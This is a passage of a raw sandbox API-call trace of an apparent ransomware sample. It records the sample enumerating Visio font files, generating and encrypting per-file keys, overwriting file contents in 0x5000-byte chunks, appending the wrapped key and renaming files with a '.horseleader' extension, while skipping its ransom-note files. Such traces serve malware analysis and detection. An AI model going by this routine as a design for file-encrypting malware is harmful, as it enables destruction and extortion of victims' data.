lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.557] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xd76b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.557] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.559] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.559] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.560] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.560] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.560] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.560] CloseHandle (hObject=0x1a4) returned 1 [0250.560] GetProcessHeap () returned 0x780000 [0250.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.560] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX.horseleader") returned 92 [0250.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx.horseleader")) returned 1 [0250.561] GetProcessHeap () returned 0x780000 [0250.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.562] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2656900, ftCreationTime.dwHighDateTime=0x1c2706c, ftLastAccessTime.dwLowDateTime=0x820ca2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2656900, ftLastWriteTime.dwHighDateTime=0x1c2706c, nFileSizeHigh=0x0, nFileSizeLow=0x2b01, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="IC-TXT.SHX", cAlternateFileName="")) returned 1 [0250.562] lstrcmpiW (lpString1="IC-TXT.SHX", lpString2="Windows") returned -1 [0250.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0250.562] StrStrIW (lpFirst="IC-TXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.562] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.562] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.562] lstrlenW (lpString=".testttjffg") returned 11 [0250.562] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.562] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.562] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0250.563] StrStrW (lpFirst="IC-TXT.SHX", lpSrch=".txt") returned 0x0 [0250.563] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11009) returned 1 [0250.563] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2b01, lpOverlapped=0x0) returned 1 [0250.565] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd4ff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.565] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2b01, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2b01, lpOverlapped=0x0) returned 1 [0250.566] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.566] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.566] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.566] CloseHandle (hObject=0x1a4) returned 1 [0250.566] GetProcessHeap () returned 0x780000 [0250.566] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.566] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.horseleader") returned 92 [0250.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx.horseleader")) returned 1 [0250.567] GetProcessHeap () returned 0x780000 [0250.567] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.567] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f60300, ftCreationTime.dwHighDateTime=0x1c324cc, ftLastAccessTime.dwLowDateTime=0x820ca2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc8f60300, ftLastWriteTime.dwHighDateTime=0x1c324cc, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="ICAD.FMP", cAlternateFileName="")) returned 1 [0250.568] lstrcmpiW (lpString1="ICAD.FMP", lpString2="Windows") returned -1 [0250.568] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0250.568] StrStrIW (lpFirst="ICAD.FMP", lpSrch=".horseleader") returned 0x0 [0250.568] lstrcmpW (lpString1="ICAD.FMP", lpString2="#Decrypt#.txt") returned 1 [0250.568] lstrcmpW (lpString1="ICAD.FMP", lpString2="_uninstalling_.png") returned 1 [0250.568] lstrlenW (lpString=".testttjffg") returned 11 [0250.568] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP", lpSrch=".testttjffg") returned 0x0 [0250.568] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.568] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.569] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0250.569] StrStrW (lpFirst="ICAD.FMP", lpSrch=".txt") returned 0x0 [0250.569] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=326) returned 1 [0250.569] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x146, lpOverlapped=0x0) returned 1 [0250.570] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.570] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x146, lpOverlapped=0x0) returned 1 [0250.570] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.570] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.571] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.571] CloseHandle (hObject=0x1a4) returned 1 [0250.571] GetProcessHeap () returned 0x780000 [0250.571] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.571] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.horseleader") returned 90 [0250.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp.horseleader")) returned 1 [0250.572] GetProcessHeap () returned 0x780000 [0250.572] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.572] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x853f7be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x369d3, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHGDTXT.SHX", cAlternateFileName="")) returned 1 [0250.572] lstrcmpiW (lpString1="WHGDTXT.SHX", lpString2="Windows") returned -1 [0250.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0250.572] StrStrIW (lpFirst="WHGDTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.572] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.572] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.572] lstrlenW (lpString=".testttjffg") returned 11 [0250.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.574] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0250.574] StrStrW (lpFirst="WHGDTXT.SHX", lpSrch=".txt") returned 0x0 [0250.574] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=223699) returned 1 [0250.574] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.574] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.577] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.577] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.577] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x18ce9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.578] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.579] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.579] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.579] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x319d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.579] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.582] CloseHandle (hObject=0x1a4) returned 1 [0250.582] GetProcessHeap () returned 0x780000 [0250.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.582] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.horseleader") returned 93 [0250.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx.horseleader")) returned 1 [0250.583] GetProcessHeap () returned 0x780000 [0250.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.583] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x853f7be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x2fde5, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHGTXT.SHX", cAlternateFileName="")) returned 1 [0250.583] lstrcmpiW (lpString1="WHGTXT.SHX", lpString2="Windows") returned -1 [0250.584] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0250.584] StrStrIW (lpFirst="WHGTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.584] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.584] lstrcmpW (lpString1="WHGTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.584] lstrlenW (lpString=".testttjffg") returned 11 [0250.584] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.584] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.584] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.586] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX") returned 80 [0250.586] StrStrW (lpFirst="WHGTXT.SHX", lpSrch=".txt") returned 0x0 [0250.586] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=196069) returned 1 [0250.586] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.586] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.589] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.589] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.590] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x156f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.591] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2ade5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.593] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.593] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.593] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.593] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.594] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.594] CloseHandle (hObject=0x1a4) returned 1 [0250.594] GetProcessHeap () returned 0x780000 [0250.594] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.594] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.horseleader") returned 92 [0250.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGTXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgtxt.shx.horseleader")) returned 1 [0250.595] GetProcessHeap () returned 0x780000 [0250.595] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.595] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 